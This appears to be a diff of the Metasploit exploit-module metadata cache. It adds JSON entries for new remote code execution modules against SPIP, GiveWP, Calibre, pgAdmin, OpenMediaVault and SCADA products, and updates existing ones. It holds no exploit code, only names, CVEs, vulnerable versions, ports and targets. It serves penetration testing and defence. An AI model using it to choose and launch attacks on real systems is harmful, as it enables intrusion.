+  "exploit_multi/http/spip_porte_plume_previsu_rce": {
+    "name": "SPIP Unauthenticated RCE via porte_plume Plugin",
+    "fullname": "exploit/multi/http/spip_porte_plume_previsu_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-08-16",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein",
+      "Laluka",
+      "Julien Voisin"
+    ],
+    "description": "This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.\n          The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,\n          allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a\n          payload manipulating the templating data processed by the `echappe_retour()` function, invoking\n          `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.",
+    "references": [
+      "CVE-2024-7954",
+      "URL-https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html",
+      "URL-https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-09-08 07:54:11 +0000",
+    "path": "/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/spip_porte_plume_previsu_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_multi/http/spip_rce_form": {
+    "name": "SPIP form PHP Injection",
+    "fullname": "exploit/multi/http/spip_rce_form",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-02-27",
+    "type": "exploit",
+    "author": [
+      "coiffeur",
+      "Laluka",
+      "Julien Voisin",
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits a PHP code injection in SPIP. The vulnerability exists in the\n          oubli parameter and allows an unauthenticated user to execute arbitrary commands\n          with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions\n          are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.",
+    "references": [
+      "URL-https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html",
+      "URL-https://therealcoiffeur.com/c11010",
+      "CVE-2023-27372"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-09-08 07:01:23 +0000",
+    "path": "/modules/exploits/multi/http/spip_rce_form.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/spip_rce_form",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/splunk_mappy_exec": {
    "name": "Splunk Search Remote Code Execution",
    "fullname": "exploit/multi/http/splunk_mappy_exec",
@@ -110310,7 +111103,7 @@
      "Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux",
      "Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows"
    ],
-    "mod_time": "2024-02-22 17:13:44 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb",
    "is_install_path": true,
    "ref_name": "multi/http/splunk_privilege_escalation_cve_2023_32707",
@@ -111189,7 +111982,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/multi/http/struts_default_action_mapper.rb",
    "is_install_path": true,
    "ref_name": "multi/http/struts_default_action_mapper",
@@ -112272,7 +113065,7 @@
    "targets": [
      "Trend Micro Threat Discovery Appliance 2.6.1062r1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb",
    "is_install_path": true,
    "ref_name": "multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi",
@@ -113566,7 +114359,7 @@
      "WPVDB-6a4d0af9-e1cd-4a69-a56c-3c009e207eca"
    ],
    "platform": "Linux,PHP,Unix,Windows",
-    "arch": "php",
+    "arch": "php, cmd",
    "rport": 80,
    "autofilter_ports": [
      80,
@@ -113584,9 +114377,11 @@
      "https"
    ],
    "targets": [
-      "Automatic"
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
    ],
-    "mod_time": "2024-01-16 14:49:22 +0000",
+    "mod_time": "2024-08-24 17:27:13 +0000",
    "path": "/modules/exploits/multi/http/wp_backup_migration_php_filter.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_backup_migration_php_filter",
@@ -113606,7 +114401,7 @@
      ]
    },
    "session_types": false,
-    "needs_cleanup": true
+    "needs_cleanup": null
  },
  "exploit_multi/http/wp_bricks_builder_rce": {
    "name": "Unauthenticated RCE in Bricks Builder Theme",
@@ -113975,6 +114770,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/wp_givewp_rce": {
+    "name": "GiveWP Unauthenticated Donation Process Exploit",
+    "fullname": "exploit/multi/http/wp_givewp_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-08-25",
+    "type": "exploit",
+    "author": [
+      "Villu Orav",
+      "EQSTSeminar",
+      "Julien Ahrens",
+      "Valentin Lobstein"
+    ],
+    "description": "The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution.",
+    "references": [
+      "CVE-2024-5932",
+      "URL-https://github.com/EQSTSeminar/CVE-2024-5932",
+      "URL-https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932",
+      "URL-https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-08-28 19:21:27 +0000",
+    "path": "/modules/exploits/multi/http/wp_givewp_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_givewp_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/wp_hash_form_rce": {
    "name": "WordPress Hash Form Plugin RCE",
    "fullname": "exploit/multi/http/wp_hash_form_rce",
@@ -115769,6 +116630,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/misc/calibre_exec": {
+    "name": "Calibre Python Code Injection (CVE-2024-6782)",
+    "fullname": "exploit/multi/misc/calibre_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-07-31",
+    "type": "exploit",
+    "author": [
+      "Amos Ng",
+      "Michael Heinzl"
+    ],
+    "description": "This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.",
+    "references": [
+      "URL-https://starlabs.sg/advisories/24/24-6782",
+      "CVE-2024-6782"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows_Fetch",
+      "Linux Command"
+    ],
+    "mod_time": "2024-08-03 05:13:33 +0000",
+    "path": "/modules/exploits/multi/misc/calibre_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/calibre_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/misc/claymore_dual_miner_remote_manager_rce": {
    "name": "Nanopool Claymore Dual Miner APIs RCE",
    "fullname": "exploit/multi/misc/claymore_dual_miner_remote_manager_rce",
@@ -116136,7 +117058,7 @@
      "Linux (Command)",
      "AIX (Command)"
    ],
-    "mod_time": "2023-02-08 15:46:07 +0000",
+    "mod_time": "2024-09-05 08:49:32 +0000",
    "path": "/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/ibm_tm1_unauth_rce",
@@ -118565,7 +119487,7 @@
      "Linux",
      "Windows Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-07-26 17:30:25 +0000",
    "path": "/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb",
    "is_install_path": true,
    "ref_name": "multi/sap/sap_mgmt_con_osexec_payload",
@@ -125490,7 +126412,7 @@
      "Linux",
      "CMD"
    ],
-    "mod_time": "2022-10-27 13:33:18 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/aerohive_netconfig_lfi_log_poison_rce",
@@ -128735,6 +129657,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/openmediavault_auth_cron_rce": {
+    "name": "OpenMediaVault rpc.php Authenticated Cron Remote Code Execution",
+    "fullname": "exploit/unix/webapp/openmediavault_auth_cron_rce",
+    "aliases": [
+      "exploit/multi/http/openmediavault_cmd_exec"
+    ],
+    "rank": 600,
+    "disclosure_date": "2013-10-30",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Brandon Perry <bperry.volatile@gmail.com>"
+    ],
+    "description": "OpenMediaVault allows an authenticated user to create cron jobs as root on the system.\n          An attacker can abuse this by sending a POST request via rpc.php to schedule and execute\n          a cron entry that runs arbitrary commands as root on the system.\n          All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.",
+    "references": [
+      "CVE-2013-3632",
+      "PACKETSTORM-178526",
+      "URL-https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats",
+      "URL-https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2024-07-29 14:02:29 +0000",
+    "path": "/modules/exploits/unix/webapp/openmediavault_auth_cron_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/openmediavault_auth_cron_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/openmediavault_rpc_rce": {
    "name": "OpenMediaVault rpc.php Authenticated PHP Code Injection",
    "fullname": "exploit/unix/webapp/openmediavault_rpc_rce",
@@ -130217,122 +131203,6 @@
    "session_types": false,
    "needs_cleanup": null
  },
-  "exploit_unix/webapp/spip_connect_exec": {
-    "name": "SPIP connect Parameter PHP Injection",
-    "fullname": "exploit/unix/webapp/spip_connect_exec",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2012-07-04",
-    "type": "exploit",
-    "author": [
-      "Arnaud Pachot",
-      "Frederic Cikala",
-      "Davy Douhine"
-    ],
-    "description": "This module exploits a PHP code injection in SPIP. The vulnerability exists in the\n        connect parameter and allows an unauthenticated user to execute arbitrary commands\n        with web user privileges. Branches 2.0, 2.1 and 3 are concerned. Vulnerable versions\n        are <2.0.21, <2.1.16 and < 3.0.3, but this module works only against branch 2.0 and\n        has been tested successfully with SPIP 2.0.11 and SPIP 2.0.20 with Apache on Ubuntu\n        and Fedora linux distributions.",
-    "references": [
-      "OSVDB-83543",
-      "BID-54292",
-      "URL-http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la"
-    ],
-    "platform": "PHP",
-    "arch": "php",
-    "rport": 80,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
-    "path": "/modules/exploits/unix/webapp/spip_connect_exec.rb",
-    "is_install_path": true,
-    "ref_name": "unix/webapp/spip_connect_exec",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "session_types": false,
-    "needs_cleanup": null
-  },
-  "exploit_unix/webapp/spip_rce_form": {
-    "name": "SPIP form PHP Injection",
-    "fullname": "exploit/unix/webapp/spip_rce_form",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2023-02-27",
-    "type": "exploit",
-    "author": [
-      "coiffeur",
-      "Laluka",
-      "Julien Voisin"
-    ],
-    "description": "This module exploits a PHP code injection in SPIP. The vulnerability exists in the\n          oubli parameter and allows an unauthenticated user to execute arbitrary commands\n          with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions\n          are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.",
-    "references": [
-      "URL-https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html",
-      "URL-https://therealcoiffeur.com/c11010",
-      "CVE-2023-27372"
-    ],
-    "platform": "Linux,PHP,Unix",
-    "arch": "php, cmd",
-    "rport": 80,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic (PHP In-Memory)",
-      "Automatic (Unix In-Memory)"
-    ],
-    "mod_time": "2023-02-27 22:34:46 +0000",
-    "path": "/modules/exploits/unix/webapp/spip_rce_form.rb",
-    "is_install_path": true,
-    "ref_name": "unix/webapp/spip_rce_form",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "SideEffects": [
-        "ioc-in-logs"
-      ]
-    },
-    "session_types": false,
-    "needs_cleanup": null
-  },
  "exploit_unix/webapp/squash_yaml_exec": {
    "name": "Squash YAML Code Execution",
    "fullname": "exploit/unix/webapp/squash_yaml_exec",
@@ -133181,7 +134051,7 @@
    "targets": [
      "wpDiscuz < 7.0.5"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_wpdiscuz_unauthenticated_file_upload",
@@ -147817,7 +148687,7 @@
      "Colin Ames <amesc@attackresearch.com>",
      "jduck <jduck@metasploit.com>"
    ],
-    "description": "This module embeds a Metasploit payload into an existing PDF file. The\n        resulting PDF can be sent to a target as part of a social engineering attack.",
+    "description": "This module embeds a Metasploit payload into an existing PDF file. The\n          resulting PDF can be sent to a target as part of a social engineering attack.",
    "references": [
      "CVE-2010-1240",
      "OSVDB-63667",
@@ -147827,7 +148697,7 @@
      "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html"
    ],
    "platform": "Windows",
-    "arch": "",
+    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": [

@@ -147836,9 +148706,9 @@

    ],
    "targets": [
-      "Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)"
+      "Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7/10 (English)"
    ],
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2024-08-26 16:47:26 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_pdf_embedded_exe",
@@ -147846,6 +148716,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -162110,6 +162990,7 @@
    "description": "An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).\n          FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized\n          platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which\n          can be sent directly into database queries.\n\n          FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013\n          and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.\n          In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable\n          SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code\n          execution in the context of NT AUTHORITY\\SYSTEM\n\n          Affected versions of FortiClient EMS include:\n          7.2.0 through 7.2.2\n          7.0.1 through 7.0.10\n\n          Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.\n\n          It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient\n          EMS for the necessary vulnerable services to be available.",
    "references": [
      "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/",
+      "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/",
      "URL-https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py",
      "CVE-2023-48788"
    ],
@@ -162134,7 +163015,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2024-04-12 10:00:07 +0000",
+    "mod_time": "2024-07-25 09:14:27 +0000",
    "path": "/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb",
    "is_install_path": true,
    "ref_name": "windows/http/forticlient_ems_fctid_sqli",
@@ -164161,7 +165042,7 @@
      "Windows Command",
      "Windows Powershell"
    ],
-    "mod_time": "2023-02-08 15:20:32 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb",
    "is_install_path": true,
    "ref_name": "windows/http/hpe_sim_76_amf_deserialization",
@@ -165314,6 +166195,66 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/lg_simple_editor_rce_uploadvideo": {
+    "name": "LG Simple Editor Command Injection (CVE-2023-40504)",
+    "fullname": "exploit/windows/http/lg_simple_editor_rce_uploadvideo",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-04",
+    "type": "exploit",
+    "author": [
+      "rgod",
+      "Michael Heinzl"
+    ],
+    "description": "Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.\n          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-1208/",
+      "CVE-2023-40504"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows_Fetch"
+    ],
+    "mod_time": "2024-08-13 20:29:30 +0000",
+    "path": "/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/lg_simple_editor_rce_uploadvideo",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/mailenable_auth_header": {
    "name": "MailEnable Authorization Header Buffer Overflow",
    "fullname": "exploit/windows/http/mailenable_auth_header",
@@ -165523,7 +166464,7 @@
    "targets": [
      "Windows Command"
    ],
-    "mod_time": "2022-08-05 11:34:46 +0000",
+    "mod_time": "2024-09-05 08:49:32 +0000",
    "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb",
    "is_install_path": true,
    "ref_name": "windows/http/manageengine_adaudit_plus_cve_2022_28219",
@@ -166420,7 +167361,7 @@
    "targets": [
      "Windows Command"
    ],
-    "mod_time": "2023-06-22 14:23:25 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/moveit_cve_2023_34362.rb",
    "is_install_path": true,
    "ref_name": "windows/http/moveit_cve_2023_34362",
@@ -167503,6 +168444,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/pgadmin_binary_path_api": {
+    "name": "pgAdmin Binary Path API RCE",
+    "fullname": "exploit/windows/http/pgadmin_binary_path_api",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-28",
+    "type": "exploit",
+    "author": [
+      "M.Selim Karahan",
+      "Mustafa Mutlu",
+      "Ayoub Mokhtar"
+    ],
+    "description": "pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)\n          vulnerability through the validate binary path API. This vulnerability\n          allows attackers to execute arbitrary code on the server hosting PGAdmin,\n          posing a severe risk to the database management system's integrity and the security of the underlying data.\n\n          Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.",
+    "references": [
+      "CVE-2024-3116",
+      "URL-https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/",
+      "URL-https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 8000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-08-28 18:46:08 +0000",
+    "path": "/modules/exploits/windows/http/pgadmin_binary_path_api.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/pgadmin_binary_path_api",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/http/php_apache_request_headers_bof": {
    "name": "PHP apache_request_headers Function Buffer Overflow",
    "fullname": "exploit/windows/http/php_apache_request_headers_bof",
@@ -168721,7 +169726,7 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2021-06-14 10:15:27 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb",
    "is_install_path": true,
    "ref_name": "windows/http/sharepoint_ssi_viewstate",
@@ -168787,7 +169792,7 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2021-06-14 10:15:27 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/sharepoint_unsafe_control.rb",
    "is_install_path": true,
    "ref_name": "windows/http/sharepoint_unsafe_control",
@@ -173144,7 +174149,7 @@
      "URL-https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf"
    ],
    "platform": "Windows",
-    "arch": "",
+    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": [

@@ -173155,7 +174160,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-07-21 15:34:49 +0000",
+    "mod_time": "2024-09-04 23:49:33 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_comhijack.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_comhijack",
@@ -185060,7 +186065,7 @@
    "targets": [
      "Windows Universal (x64) - v7.80.3132"
    ],
-    "mod_time": "2023-07-14 12:46:26 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/nimsoft/nimcontroller_bof",
@@ -186727,6 +187732,57 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/scada/diaenergie_sqli": {
+    "name": "DIAEnergie SQL Injection (CVE-2024-4548)",
+    "fullname": "exploit/windows/scada/diaenergie_sqli",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-06",
+    "type": "exploit",
+    "author": [
+      "Michael Heinzl",
+      "Tenable"
+    ],
+    "description": "SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.\n          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "URL-https://www.tenable.com/security/research/tra-2024-13",
+      "CVE-2024-4548"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 928,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows_Fetch"
+    ],
+    "mod_time": "2024-08-19 22:47:19 +0000",
+    "path": "/modules/exploits/windows/scada/diaenergie_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "windows/scada/diaenergie_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/factorylink_csservice": {
    "name": "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
    "fullname": "exploit/windows/scada/factorylink_csservice",
@@ -187237,6 +188293,65 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/scada/mypro_cmdexe": {
+    "name": "mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)",
+    "fullname": "exploit/windows/scada/mypro_cmdexe",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-22",
+    "type": "exploit",
+    "author": [
+      "Michael Heinzl"
+    ],
+    "description": "Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.\n          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06",
+      "CVE-2023-28384"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows_Fetch"
+    ],
+    "mod_time": "2024-07-25 23:54:27 +0000",
+    "path": "/modules/exploits/windows/scada/mypro_cmdexe.rb",
+    "is_install_path": true,
